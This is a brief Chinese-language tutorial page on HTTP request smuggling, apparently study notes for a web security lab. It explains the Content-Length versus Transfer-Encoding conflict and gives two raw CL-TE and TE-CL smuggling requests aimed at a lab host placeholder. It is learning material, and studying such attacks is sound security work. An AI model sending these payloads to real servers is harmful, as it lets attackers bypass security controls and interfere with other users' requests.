Http Smuggling

DeeLMind小于 1 分钟

Http Smuggling

YouTube系列教程open in new window

B站系列教程open in new window

什么是 Http Smuggling

HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术。请求走私漏洞本质上通常很关键,它使攻击者可以绕过安全控制,未经授权访问敏感数据并直接危害其他应用程序用户。

er

er

er

CL(TE) - TE(CL)

  • Content-Length
  • Transfer-Encoding

TE-CL

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: x
Transfer-Encoding: chunked

aa

GET /404 HTTP/1.1
X-Ignore: X

0

CL-TE

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Transfer-Encoding: chunked

0

GET /404 HTTP/1.1
X-Ignore: X

0
上次编辑于:
贡献者: DeeLMind,DeeLMind